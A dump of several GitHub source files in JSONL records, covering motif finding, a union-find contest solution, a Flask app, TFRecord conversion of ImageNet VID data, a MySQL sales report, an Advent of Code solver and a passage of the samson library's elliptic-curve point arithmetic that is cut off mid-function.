range(len(self.seqs))]\n best_score = self.score_pseudo(s)\n bests = list(s)\n for it in range(iterations):\n seq_index = randint(0, len(self.seqs) - 1)\n seq = self.seqs[seq_index]\n s.pop(seq_index)\n removed = self.seqs.pop(seq_index)\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n motif.pwm = [[motif.pwm[lin][col] + 0.1 for col in range(len(motif.pwm[0]))] for lin in range(len(motif.pwm))]\n self.seqs.insert(seq_index, removed) # vai voltar a adicionar a seq removida à lista de seqs na posição seq_index\n r = motif.probAllPositions(seq)\n pos = self.roulette(r)\n s.insert(seq_index, pos)\n score = self.score_pseudo(s)\n if score > best_score:\n best_score = score\n bests = list(s)\n return bests\n\n def roulette(self, f):\n from random import random\n tot = 0.0\n for x in f: tot += (0.01 + x)\n val = random() * tot\n acum = 0.0\n ind = 0\n while acum < val:\n acum += (f[ind] + 0.01)\n ind += 1\n return ind - 1\n\n\n# tests\ndef test1():\n sm = MotifFinding()\n sm.readFile(\"exemploMotifs.txt\", \"dna\")\n sol = [25, 20, 2, 55, 59]\n sa = sm.score(sol)\n print(sm.score_pseudo(sol))\n print(sa)\n scm = sm.scoreMult(sol)\n print(scm)\n\n\ndef test2():\n print(\"Test exhaustive:\")\n seq1 = MySeq(\"ATAGAGCTGA\", \"dna\")\n seq2 = MySeq(\"ACGTAGATGA\", \"dna\")\n seq3 = MySeq(\"AAGATAGGGG\", \"dna\")\n mf = MotifFinding(3, [seq1, seq2, seq3])\n sol = mf.exhaustiveSearch()\n print(\"Solution\", sol)\n print(\"Score: \", mf.score(sol))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol).consensus())\n\n print(\"Branch and Bound:\")\n sol2 = mf.branchAndBound()\n print(\"Solution: \", sol2)\n print(\"Score:\", mf.score(sol2))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol2).consensus())\n\n print(\"Heuristic consensus: \")\n sol1 = mf.heuristicConsensus()\n print(\"Solution: \", sol1)\n print(\"Score:\", mf.score(sol1))\n\n\ndef test3():\n mf = MotifFinding()\n mf.readFile(\"exemploMotifs.txt\", \"dna\")\n print(\"Branch and Bound:\")\n sol = mf.branchAndBound()\n print(\"Solution: \", sol)\n print(\"Score:\", mf.score(sol))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol).consensus())\n\n\ndef test4():\n mf = MotifFinding()\n mf.readFile(\"exemploMotifs.txt\", \"dna\")\n print(\"Heuristic stochastic\")\n sol = mf.heuristicStochastic()\n print(\"Solution: \", sol)\n print(\"Score:\", mf.score(sol))\n print(mf.score_pseudo(sol))\n print(\"Score mult:\", mf.scoreMult(sol))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol).consensus())\n sol2 = mf.gibbs(1000)\n print(\"Score:\", mf.score(sol2))\n print(\"Score mult:\", mf.scoreMult(sol2))\n\n\ntest1()\nprint()\ntest2()\nprint()\ntest3()\nprint()\ntest4()\n","repo_name":"mpereira19/AAB","sub_path":"MotifFinding.py","file_name":"MotifFinding.py","file_ext":"py","file_size_in_byte":10550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14217062259","text":"# from __future__ import annotations\nfrom typing import List,Union\nimport sys\ninput = sys.stdin.readline\n# from collections import defaultdict,deque\n# from itertools import permutations,combinations\n# from bisect import bisect_left,bisect_right\n# import heapq\n# sys.setrecursionlimit(10**5)\n\nclass UnionFind():\n def __init__(self, N:int):\n self.par = [-1] * N\n self.size = [1] * N\n\n def root(self, x:int):\n \"\"\"\n 頂点xの根を返す\n 通った頂点は直接根につなぐ\n \"\"\"\n if self.par[x] == -1: return x\n self.par[x] = self.root(self.par[x])\n self.size[x] = 1\n return self.par[x]\n\n def unite(self, x:int, y:int):\n \"\"\"\n xを含むグループとyを含むグループを併合\n その際、サイズの大きい方を根とする\n \"\"\"\n rx, ry = self.root(x), self.root(y)\n if rx == ry: return 0\n size_x = self.size[rx]\n size_y = self.size[ry]\n if self.size[rx] >= self.size[ry]:\n self.par[ry] = rx\n self.size[rx] += self.size[ry]\n else:\n self.par[rx] = ry\n self.size[ry] += self.size[rx]\n return size_x * size_y\n\n\ndef main():\n N,M = map(int, input().split())\n AB = [tuple(map(lambda x:int(x)-1, input().split())) for _ in range(M)]\n ans = []\n now = N*(N-1)//2\n group = UnionFind(N)\n for i in range(M)[::-1]:\n a,b = AB[i]\n ans.append(now)\n now -= group.unite(a,b)\n\n for a in ans[::-1]:\n print(a)\n\n\nif __name__ == '__main__':\n main()","repo_name":"tokuD/atcoder","sub_path":"Practice/087.py","file_name":"087.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1699408280","text":"import sys\nsys.path.append('.')\nsys.path.append('..')\n\nimport argparse\n\nfrom flask import Flask, render_template\nimport os\nimport yaml \nfrom utils.config import Config\n\nPEOPLE_FOLDER = os.path.join('static')\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = PEOPLE_FOLDER\n\n@app.route('/')\n@app.route('/index')\n\ndef show_index():\n full_filename = os.path.join(app.config['UPLOAD_FOLDER'], 'last.jpeg')\n return render_template(\"index.html\", user_image = full_filename)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default='config.yaml', help='Configuration')\n args = parser.parse_args()\n config = Config(yaml.load(open(args.config, 'r'), Loader=yaml.Loader))\n\n port = int(os.environ.get('PORT', config.APP.PORT))\n app.run(port = port, debug = True, use_reloader = False)\n\n","repo_name":"nero1342/Innoworks2021-APCSK18","sub_path":"services/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27919688133","text":"import os\nimport io\nimport glob\nimport math\nimport hashlib\nimport logging\nimport tf_detectors.utils.dataset_util as dataset_util\nimport tensorflow as tf\n\nfrom lxml import etree\nfrom PIL import Image\n\n\"\"\"\nUsage : python vid_2015_to_tfrecord.py \\\n --root_dir=/path/to/VID2015_dataset/ILSVRC \\\n --output_path=/tmp/vid2015_tfrecord\n\nXML format(example):\n\n ILSVRC2015_VID_train_0000/ILSVRC2015_train_00005009\n 000008\n \n ILSVRC_2015\n \n \n 1280\n 576\n \n \n 0\n n02084071\n \n 976\n 675\n 451\n 115\n \n 0\n 0\n \n\n\"\"\"\n\nflags = tf.app.flags\nflags.DEFINE_string('root_dir', '', 'Root directory to raw VID 2015 dataset.')\nflags.DEFINE_string('set', 'train', 'Convert training set, validation set.')\nflags.DEFINE_string('output_path', './data/VID2015', 'Path to output TFRecord')\nflags.DEFINE_integer('start_shard', 0, 'Start index of TFRcord files')\nflags.DEFINE_integer('num_shards', 10, 'The number of TFRcord files')\nflags.DEFINE_integer('num_frames', 10, 'The number of frame to use')\nflags.DEFINE_integer('num_examples', -1, 'The number of video to convert to TFRecord file')\nFLAGS = flags.FLAGS\n\nSETS = ['train', 'val', 'test']\nMAX_INTERVAL = 5\n\ndef sample_frames(xml_files):\n samples_size = (len(xml_files) - 1) // FLAGS.num_frames + 1\n samples = []\n for s in range(samples_size):\n start = FLAGS.num_frames * s\n end = FLAGS.num_frames * (s+1)\n sample = xml_files[start:end]\n while len(sample) < FLAGS.num_frames:\n sample.append(sample[-1])\n samples.append(sample)\n return samples\n\ndef gen_shard(examples_list, annotations_dir, out_filename,\n root_dir, _set):\n writer = tf.python_io.TFRecordWriter(out_filename)\n for indx, example in enumerate(examples_list):\n ## sample frames\n xml_pattern = os.path.join(annotations_dir, example + '/*.xml')\n xml_files = sorted(glob.glob(xml_pattern))\n samples = sample_frames(xml_files)\n for sample in samples:\n dicts = []\n for xml_file in sample:\n ## process per single xml\n with tf.gfile.GFile(xml_file, 'r') as fid:\n xml_str = fid.read()\n xml = etree.fromstring(xml_str)\n dic = dataset_util.recursive_parse_xml_to_dict(xml)['annotation']\n dicts.append(dic)\n tf_example = dicts_to_tf_example(dicts, root_dir, _set)\n writer.write(tf_example.SerializeToString())\n writer.close()\n return\n\ndef dicts_to_tf_example(dicts, root_dir, _set):\n \"\"\" Convert XML derived dict to tf.Example proto.\n \"\"\"\n # Non sequential data\n folder = dicts[0]['folder']\n filenames = [dic['filename'] for dic in dicts]\n height = int(dicts[0]['size']['height'])\n width = int(dicts[0]['size']['width'])\n\n# # Get image paths\n imgs_dir = os.path.join(root_dir,\n 'Data/VID/{}'.format(_set),\n folder)\n imgs_path = sorted([os.path.join(imgs_dir, filename) + '.JPEG'\n for filename in filenames])\n #glob.glob(imgs_dir + '/*.JPEG'))\n\n # Frames Info (image)\n filenames = []\n encodeds = []\n sources = []\n keys = []\n formats = []\n # Frames Info (objects)\n xmins, ymins = [], []\n xmaxs, ymaxs = [], []\n names = []\n occludeds = []\n generateds = []\n\n # Iterate frames\n for data, img_path in zip(dicts, imgs_path):\n ## open single frame\n with tf.gfile.FastGFile(img_path, 'rb') as fid:\n encoded_jpg = fid.read()\n encoded_jpg_io = io.BytesIO(encoded_jpg)\n image = Image.open(encoded_jpg_io)\n if image.format != 'JPEG':\n raise ValueError('Image format not JPEG')\n key = hashlib.sha256(encoded_jpg).hexdigest()\n\n ## validation\n assert int(data['size']['height']) == height\n assert int(data['size']['width']) == width\n\n ## iterate objects\n xmin, ymin = [], []\n xmax, ymax = [], []\n name = []\n occluded = []\n generated = []\n if 'object' in data:\n for obj in data['object']:\n xmin.append(float(obj['bndbox']['xmin']) / width)\n ymin.append(float(obj['bndbox']['ymin']) / height)\n xmax.append(float(obj['bndbox']['xmax']) / width)\n ymax.append(float(obj['bndbox']['ymax']) / height)\n name.append(obj['name'].encode('utf8'))\n occluded.append(int(obj['occluded']))\n generated.append(int(obj['generated']))\n else:\n xmin.append(float(-1))\n ymin.append(float(-1))\n xmax.append(float(-1))\n ymax.append(float(-1))\n name.append('NoObject'.encode('utf8'))\n occluded.append(0)\n generated.append(0)\n\n ## append tf_feature to list\n filenames.append(dataset_util.bytes_feature(data['filename'].encode('utf8')))\n encodeds.append(dataset_util.bytes_feature(encoded_jpg))\n sources.append(dataset_util.bytes_feature(data['source']['database'].encode('utf8')))\n keys.append(dataset_util.bytes_feature(key.encode('utf8')))\n formats.append(dataset_util.bytes_feature('jpeg'.encode('utf8')))\n xmins.append(dataset_util.float_list_feature(xmin))\n ymins.append(dataset_util.float_list_feature(ymin))\n xmaxs.append(dataset_util.float_list_feature(xmax))\n ymaxs.append(dataset_util.float_list_feature(ymax))\n names.append(dataset_util.bytes_list_feature(name))\n occludeds.append(dataset_util.int64_list_feature(occluded))\n generateds.append(dataset_util.int64_list_feature(generated))\n\n # Non sequential features\n context = tf.train.Features(feature={\n 'video/folder': dataset_util.bytes_feature(folder.encode('utf8')),\n 'video/frame_number': dataset_util.int64_feature(len(imgs_path)),\n 'video/height': dataset_util.int64_feature(height),\n 'video/width': dataset_util.int64_feature(width),\n })\n # Sequential features\n tf_feature_lists = {\n 'image/filename': tf.train.FeatureList(feature=filenames),\n 'image/encoded': tf.train.FeatureList(feature=encodeds),\n 'image/sources': tf.train.FeatureList(feature=sources),\n 'image/key/sha256': tf.train.FeatureList(feature=keys),\n 'image/format': tf.train.FeatureList(feature=formats),\n 'image/object/bbox/xmin': tf.train.FeatureList(feature=xmins),\n 'image/object/bbox/xmax': tf.train.FeatureList(feature=xmaxs),\n 'image/object/bbox/ymin': tf.train.FeatureList(feature=ymins),\n 'image/object/bbox/ymax': tf.train.FeatureList(feature=ymaxs),\n 'image/object/name': tf.train.FeatureList(feature=names),\n 'image/object/occluded': tf.train.FeatureList(feature=occludeds),\n 'image/object/generated': tf.train.FeatureList(feature=generateds),\n }\n feature_lists = tf.train.FeatureLists(feature_list=tf_feature_lists)\n # Make single sequence example\n tf_example = tf.train.SequenceExample(context=context, feature_lists=feature_lists)\n return tf_example\n\ndef main(_):\n root_dir = FLAGS.root_dir\n\n if FLAGS.set not in SETS:\n raise ValueError('set must be in : {}'.format(SETS))\n\n # Read Example list files\n logging.info('Reading from VID 2015 dataset. ({})'.format(root_dir))\n list_file_pattern = 'ImageSets/VID/{}*.txt'.format(FLAGS.set)\n examples_paths = sorted(glob.glob(os.path.join(root_dir, list_file_pattern)))\n examples_list = []\n for examples_path in examples_paths:\n examples_list.extend(dataset_util.read_examples_list(examples_path))\n if FLAGS.num_examples > 0:\n examples_list = examples_list[:FLAGS.num_examples]\n\n # Sharding\n start_shard = FLAGS.start_shard\n num_shards = FLAGS.num_shards\n num_digits = math.ceil(math.log10(max(num_shards-1,2)))\n shard_format = '%0'+ ('%d'%num_digits) + 'd'\n examples_per_shard = int(math.ceil(len(examples_list)/float(num_shards)))\n annotations_dir = os.path.join(root_dir,\n 'Annotations/VID/{}'.format(FLAGS.set))\n # Generate each shard\n for i in range(start_shard, num_shards):\n start = i * examples_per_shard\n end = (i+1) * examples_per_shard\n out_filename = os.path.join(FLAGS.output_path,\n 'VID_2015-'+(shard_format % i)+'.tfrecord')\n if os.path.isfile(out_filename): # Don't recreate data if restarting\n continue\n print (str(i)+'of'+str(num_shards)+'['+str(start)+':'+str(end),']'+out_filename)\n gen_shard(examples_list[start:end], annotations_dir, out_filename,\n root_dir, FLAGS.set)\n return\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"wakanda-ai/tf-detectors","sub_path":"datasets/VID2015/vid_2015_to_tfrecord.py","file_name":"vid_2015_to_tfrecord.py","file_ext":"py","file_size_in_byte":9197,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"38241826174","text":"#! /usr/bin/env python\n\nimport sys\nimport re \nimport csv\nimport MySQLdb as mdb\nimport pandas as pd\nfrom openpyxl import load_workbook\nimport time\nimport collections\nfrom simple_salesforce import Salesforce\n\nsys.path.insert(0,'/home/analytics/analytics_sandbox/python_libs');\nsys.path.insert(0,'/home/analytics/analytics_sandbox/FY14/sales');\nfrom common_libs import *\nfrom create_mysql import *\nfrom attask_libs import * \nfrom attask_api import StreamClient, ObjCode, AtTaskObject\n\ncur_datetime = datetime.now()\nexecfile('/home/analytics/analytics_sandbox/python_libs/stuff.py')\n\npd.set_option('display.width',1000)\npd.set_option('display.max_colwidth',200)\npd.set_option('display.max_rows',400)\n\nDBNAME = \"benchmark_prod\"\n\ncon = None\ncon = mdb.connect('localhost','root','','');\ncur = con.cursor()\n\nquery_group = []\nquery_group.append('AutoSpark')\nquery_group.append('AE')\nquery_group.append('AE (Templa')\nquery_group.append('PPT')\n\ncur_week = (cur_datetime - timedelta(days=1)).date()\n\n#### Top-10 by MKTG effectiveness\nquery = \"SELECT account_id,account_name,yearweek,industry_name,Nvideo,Nparent as Nview,Nuser,USER_reach,BEEs,AVG_target_audience \\\n\t\t\tFROM %s.AER_REACH_SUMMARY_DATEINTERVAL_WEEKLY_account \\\n\t\t\tWHERE yearweek = '%s' and BEEs > 1 ORDER BY USER_reach desc\" % (DBNAME,cur_week)\n\nquery = query.replace('\\t','');\ntop10_mktg_effectiveness_df = createDF_from_MYSQL_query(query)\ntop10_mktg_effectiveness_df = top10_mktg_effectiveness_df.rename(columns={'USER_reach':'MKTG Effectiveness'})\n \n#### Top-10 by Nuser\nquery = \"SELECT account_id,account_name,yearweek,industry_name,Nvideo,Nparent as Nview,Nuser,USER_reach,BEEs,AVG_target_audience \\\n\t\t\tFROM %s.AER_REACH_SUMMARY_DATEINTERVAL_WEEKLY_account \\\n\t\t\tWHERE yearweek = '%s' and BEEs > 1 ORDER BY Nuser desc\" % (DBNAME,cur_week)\n\nquery = query.replace('\\t','');\ntop10_Nuser_df = createDF_from_MYSQL_query(query)\ntop10_Nuser_df = top10_Nuser_df.rename(columns={'USER_reach':'MKTG Effectiveness'})\n \ncolumns = ['account_id','account_name','yearweek','industry_name', \\\n\t\t\t'Nvideo','Nview','Nuser','MKTG Effectiveness','BEEs','AVG_target_audience']\nspecial_format= {}\nspecial_format['MKTG Effectiveness'] = \"0.0%\" \ncreateXLSX('./output/top10_weekly','Top 10 MKTG Effectiveness',columns,special_format,top10_mktg_effectiveness_df[0:11],True)\ncreateXLSX('./output/top10_weekly','Top 10 Nuser',columns,special_format,top10_Nuser_df[0:11],False)\n\nexecfile('email_attachment_top10.py')\n","repo_name":"djohnsonguidespark/gs-datascience-sandbox","sub_path":"top10/top10_weekly_tracking.py","file_name":"top10_weekly_tracking.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35335784289","text":"# https://adventofcode.com/2022/day/7\n\nfrom itertools import chain\n\nclass Node:\n def __init__(self, name, parent=None, size=0):\n self.name = name\n self.parent = parent\n self.size = size\n self.children = []\n\n def tally(self):\n if self.children: \n self.size = sum(c.tally() for c in self.children)\n return self.size\n\n def sizes(self):\n yield from chain.from_iterable(\n c.sizes()\n for c in self.children\n if c.children\n )\n yield self.size\n\ndef parse_root(raw):\n curr = root = Node('/')\n for line in raw:\n if line == '$ cd /': continue\n elif line.startswith('$ cd '): \n dst = line[5:]\n curr = (\n curr.parent \n if dst == '..' else \n next(c for c in curr.children if c.name == dst)\n )\n else:\n a, b = line.split()\n if a == 'dir' : curr.children += Node(b, curr),\n if a.isdigit(): curr.children += Node(b, curr, int(a)),\n root.tally()\n return root\n\ndef fst_star(root): \n return sum(filter(lambda x: x <= 100000, root.sizes()))\n\ndef snd_star(root):\n target = root.size - 40000000\n return min(filter(lambda x: x >= target, root.sizes()))\n\nTEST = '''\\\n$ cd /\n$ ls\ndir a\n14848514 b.txt\n8504156 c.dat\ndir d\n$ cd a\n$ ls\ndir e\n29116 f\n2557 g\n62596 h.lst\n$ cd e\n$ ls\n584 i\n$ cd ..\n$ cd ..\n$ cd d\n$ ls\n4060174 j\n8033020 d.log\n5626152 d.ext\n7214296 k'''.splitlines()\n\nif __name__ == '__main__':\n root = parse_root(TEST)\n assert fst_star(root) == 95437\n assert snd_star(root) == 24933642\n\n root = parse_root(open('data/day07.in').read().splitlines())\n print(fst_star(root))\n print(snd_star(root))","repo_name":"andy1li/adventofcode","sub_path":"2022/day07_dirs.py","file_name":"day07_dirs.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33022467588","text":"from samson.math.symbols import Symbol\nfrom samson.math.algebra.rings.ring import Ring, RingElement\nfrom samson.math.polynomial import Polynomial\nfrom samson.math.factorization.general import factor, is_perfect_power\nfrom samson.math.algebra.curves.util import EllipticCurveCardAlg\nfrom samson.math.general import mod_inv, schoofs_algorithm, gcd, hasse_frobenius_trace_interval, sieve_of_eratosthenes, product, crt, is_prime, kth_root, batch_inv, lcm, frobenius_trace_mod_l, legendre, cornacchias_algorithm, hilbert_class_polynomial, random_int, random_int_between, find_prime, primes, cyclomotic_polynomial\nfrom samson.math.discrete_logarithm import pohlig_hellman\nfrom samson.math.map import Map\nfrom samson.utilities.exceptions import NoSolutionException, SearchspaceExhaustedException, CoercionException\nfrom samson.utilities.runtime import RUNTIME\nfrom typing import Tuple\nimport math\n\nfrom samson.auxiliary.lazy_loader import LazyLoader\n_elliptic_curve_isogeny = LazyLoader('_elliptic_curve_isogeny', globals(), 'samson.math.algebra.curves.elliptic_curve_isogeny')\n\n\ndef _get_possible_traces_for_D(D, N):\n sols = []\n try:\n sols.extend([t for t,_ in cornacchias_algorithm(abs(D), 4*N, use_hensel=True, all_sols=True)])\n except NoSolutionException:\n pass\n\n try:\n sols.extend([t*2 for t,_ in cornacchias_algorithm(abs(D), N, use_hensel=True, all_sols=True)])\n except NoSolutionException:\n pass\n\n if not sols:\n raise NoSolutionException\n \n return sols\n\n\n_D_MAP = [11, 19, 43, 67, 163, 27, 35, 51, 91, 115, 123, 187, 235, 267, 403, 427]\n\n\nclass WeierstrassPoint(RingElement):\n \"\"\"\n Point on a Weierstrass curve.\n \"\"\"\n\n def __init__(self, x: RingElement, y: RingElement, curve: 'WeierstrassCurve', z: RingElement=None):\n self._x = curve.ring.coerce(x)\n self._y = curve.ring.coerce(y)\n self._z = curve.ring.coerce(curve.ring.one if z is None else z)\n self.curve = curve\n self.order_cache = None\n\n\n def __reprdir__(self):\n return ['x', 'y', 'curve']\n\n\n def __getitem__(self, idx):\n return [self.x, self.y, self.z][idx]\n\n\n def shorthand(self) -> str:\n return f'{self.curve.shorthand()}({{x={self.x}, y={self.y}}})'\n\n\n def tinyhand(self) -> str:\n return f'({self.x} : {self.y} : {self.z})'\n\n\n @property\n def ring(self):\n return self.curve\n\n\n @property\n def val(self):\n return self.x\n\n\n def _collapse_coords(self):\n if self._z and self._z != self._x.ring.one:\n z_inv = ~self._z\n self._x *= z_inv\n self._y *= z_inv\n self._z = self._x.ring.one\n\n\n @property\n def x(self):\n self._collapse_coords()\n return self._x\n\n @property\n def y(self):\n self._collapse_coords()\n return self._y\n\n @property\n def z(self):\n self._collapse_coords()\n return self._z\n\n\n def __hash__(self):\n return hash((self.curve, self.x, self.y))\n\n\n def __int__(self) -> int:\n return int(self.x)\n \n\n def __elemmul__(self, other: 'RingElement') -> 'RingElement':\n raise ValueError('Elliptic curves do not have element multiplication')\n\n\n def fast_compare_x(self, P2: 'WeierstrassPoint') -> bool:\n return P2._x*self._z == self._x*P2._z\n\n\n def fast_compare_y(self, P2: 'WeierstrassPoint') -> bool:\n return P2._y*self._z == self._y*P2._z\n\n def __eq__(self, P2: 'WeierstrassPoint') -> bool:\n return self.curve == P2.curve and self.fast_compare_x(P2) and self.fast_compare_y(P2)\n\n\n def __lt__(self, other: 'WeierstrassPoint') -> bool:\n other = self.ring.coerce(other)\n if self.ring != other.ring:\n raise ValueError(\"Cannot compare elements with different underlying rings.\")\n \n X1, Z1 = self._x, self._z\n X2, Z2 = other._x, other._z\n V1 = X2*Z1\n V2 = X1*Z2\n\n return V2 < V1\n\n\n def __gt__(self, other: 'WeierstrassPoint') -> bool:\n other = self.ring.coerce(other)\n if self.ring != other.ring:\n raise ValueError(\"Cannot compare elements with different underlying rings.\")\n\n X1, Z1 = self._x, self._z\n X2, Z2 = other._x, other._z\n V1 = X2*Z1\n V2 = X1*Z2\n\n return V2 > V1\n\n\n def __neg__(self) -> 'WeierstrassPoint':\n return WeierstrassPoint(self._x, -self._y, self.curve, self._z)\n\n\n def __double(self):\n if not self._y:\n return self.curve.POINT_AT_INFINITY\n\n X, Y, Z = self._x, self._y, self._z\n W = self.curve.a*(Z*Z) + (X*X)*3\n S = Y*Z\n B = X*Y*S\n B4 = B*4\n H = W*W - B4*2\n X_ = H*S*2\n S2 = S*S*8\n Y_ = W*(B4 - H) - (Y*Y)*S2\n Z_ = S*S2\n\n return WeierstrassPoint(x=X_, y=Y_, z=Z_, curve=self.curve)\n\n\n def add_no_cache(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n # https://en.wikibooks.org/wiki/Cryptography/Prime_Curve/Standard_Projective_Coordinates\n if self.curve.POINT_AT_INFINITY == P2:\n return self\n\n elif self.curve.POINT_AT_INFINITY == self:\n return P2\n\n X1, Y1, Z1 = self._x, self._y, self._z\n X2, Y2, Z2 = P2._x, P2._y, P2._z\n A = self.curve.a\n\n U1 = Y2*Z1\n U2 = Y1*Z2\n V1 = X2*Z1\n V2 = X1*Z2\n\n if V1 == V2:\n if U1 == U2:\n return self.__double()\n else:\n return self.curve.POINT_AT_INFINITY\n\n U = U1 - U2\n V = V1 - V2\n W = Z1*Z2\n VS = V*V\n VT = VS*V\n VS2 = VS*V2\n A = (U*U)*W - VT - VS2*2\n X3 = V*A\n Y3 = U*(VS2 - A) - VT*U2\n Z3 = VT*W\n\n return WeierstrassPoint(x=X3, y=Y3, z=Z3, curve=self.curve)\n\n\n def mul_no_cache(self, other: int) -> 'WeierstrassPoint':\n return super().__mul__(other)\n \n\n @RUNTIME.global_cache()\n def __add__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return self.add_no_cache(P2)\n\n\n def __radd__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return self.__add__(P2)\n\n\n def __sub__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return self + (-P2)\n\n\n def __rsub__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return -self + P2\n\n\n def __mul__(self, other: int) -> 'WeierstrassPoint':\n result = self.mul_no_cache(other)\n result._collapse_coords()\n return result\n\n\n\n def __truediv__(self, other: 'WeierstrassPoint') -> 'WeierstrassPoint':\n if type(other) is int:\n return self*mod_inv(other, self.order())\n\n elif not other:\n raise ZeroDivisionError\n\n elif not self:\n return 0\n\n # Is it an anomalous curve? Do additive transfer\n elif not (self * self.ring.ring.characteristic()):\n phi = self.curve.additive_transfer_map()\n return int((phi(self) / phi(other))[0])\n\n else:\n E = self.ring\n P = E(other)\n ord_facs = factor(P.order())\n\n # Is it even economical?\n if RUNTIME.enable_MOV_attack and max(ord_facs).bit_length() > RUNTIME.index_calculus_supremacy and (E.is_supersingular() or E.embedding_degree() < 7):\n Q = self\n\n # Implementation detail: Elliptic curve operations faster than\n # poly mul/div, so only do index calculus on large groups\n large_facs = {p: e for p,e in ord_facs.items() if p.bit_length() > RUNTIME.index_calculus_supremacy}\n small_facs = ord_facs - large_facs\n large_facs = ord_facs - small_facs\n large_subgroup = product([p**e for p,e in large_facs.items()])\n small_subgroup = P.order() // large_subgroup\n\n\n res = pohlig_hellman(P * large_subgroup, Q * large_subgroup, factors=small_facs)\n\n if res * P == Q:\n return res\n\n\n # Confine points to the large subgroup\n Qp = Q * small_subgroup\n Pp = P * small_subgroup\n\n phi = Pp.multiplicative_transfer_map()\n W1 = phi(Pp)\n W2 = phi(Qp)\n\n return crt([(W2/W1, large_subgroup), (res, small_subgroup)])[0]\n\n return pohlig_hellman(P, self, factors=ord_facs)\n\n\n __floordiv__ = __truediv__\n\n\n def line(self, R: 'WeierstrassPoint', Q: 'WeierstrassPoint') -> 'RingElement':\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_point.py#L1270\n \"\"\"\n if not Q:\n raise ValueError(\"'Q' cannot be zero\")\n\n if not self or not R:\n if self == R:\n return self.ring.ring.one\n if R:\n return Q.x - R.x\n else:\n return Q.x - self.x\n\n elif self != R:\n if self.x == R.x:\n return Q.x - self.x\n else:\n l = (R.y - self.y) / (R.x - self.x)\n return Q.y - self.y - l * (Q.x - self.x)\n\n else:\n den = (2*self.y)\n\n if not den:\n return Q.x - self.x\n else:\n l = (3*self.x**2 + self.ring.a)/den\n return Q.y - self.y - l * (Q.x - self.x)\n\n\n\n def miller(self, Q: 'WeierstrassPoint', n: int) -> 'RingElement':\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_point.py#L1345\n \"\"\"\n if not Q:\n raise ValueError(\"'Q' cannot be zero\")\n\n if not n:\n raise ValueError(\"'n' cannot be zero\")\n\n # Handle negatives later\n is_neg = False\n\n if n < 0:\n n = abs(n)\n is_neg = True\n\n t = self.ring.ring.one\n V = self\n\n # Double and add\n for bit in [int(bit) for bit in bin(n)[3:]]:\n S = 2*V\n l = V.line(V, Q)\n v = S.line(-S, Q)\n t = (t**2)*(l/v)\n V = S\n\n if bit:\n S = V+self\n l = V.line(self, Q)\n v = S.line(-S, Q)\n t = t*(l/v)\n V = S\n\n\n if is_neg:\n v = V.line(-V, Q)\n t = ~(t*v)\n\n return t\n\n\n def weil_pairing(self, Q: 'WeierstrassPoint', n: int=None) -> 'RingElement':\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_point.py#L1520\n \"\"\"\n E = self.ring\n n = n or self.order()\n\n if not Q in E:\n raise ValueError(f\"Q: {Q} is not on {E}\")\n\n # Ensure P and Q are both in E[n]\n if n*self:\n raise ValueError(f\"self: {self} is not {n}-torsion\")\n\n if n*Q:\n raise ValueError(f\"Q: {Q} is not {n}-torsion\")\n\n one = E.ring.one\n\n if self == Q:\n return one\n\n if not self or not Q:\n return one\n\n try:\n res = self.miller(Q, n) / Q.miller(self, n)\n\n if n % 2:\n res = -res\n\n return res\n\n except ZeroDivisionError:\n return one\n\n\n\n def tate_pairing(self, Q: 'WeierstrassPoint', n: int=None, k :int=None) -> 'RingElement':\n n = n or self.order()\n k = k or self.ring.embedding_degree()\n p = self.ring.ring.characteristic()\n\n return self.miller(Q, n)**((p**k-1) // n)\n\n\n @RUNTIME.global_cache(4)\n def multiplicative_transfer_map(self) -> 'Map':\n \"\"\"\n Generates a map to `Fq*` such that if `Q` = `self`*`d`, then `phi(Q)` = `phi(self)`*`d`.\n\n Returns:\n Map: Map function.\n \n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.general import random_int\n >>> E = EllipticCurve.generate_curve_with_trace(10, 0)\n >>> E.embedding_degree()\n 2\n\n >>> g = E.G\n >>> d = random_int(E.G.order())\n >>> q = g*d\n >>> M = g.multiplicative_transfer_map()\n >>> M(q)/M(g) == d\n True\n\n \"\"\"\n from samson.math.algebra.fields.finite_field import FiniteField as GF\n E = self.curve\n F = E.ring\n\n k = E.embedding_degree()\n K = GF(F.characteristic(), k)\n E_ = WeierstrassCurve(K(E.a), K(E.b))\n Km = K.mul_group()\n\n P = E_(self)\n o = P.order()\n\n while True:\n R = E_.find_element_of_order(o)\n W2 = P.weil_pairing(R, o)\n\n if Km(W2).order() == o:\n def mul_trans(Q):\n return Km(E_(Q).weil_pairing(R, o))\n\n phi = Map(E, Km, mul_trans)\n phi.R = R\n return phi\n\n\n def __batch_invert_zs(self, points):\n zeroes = 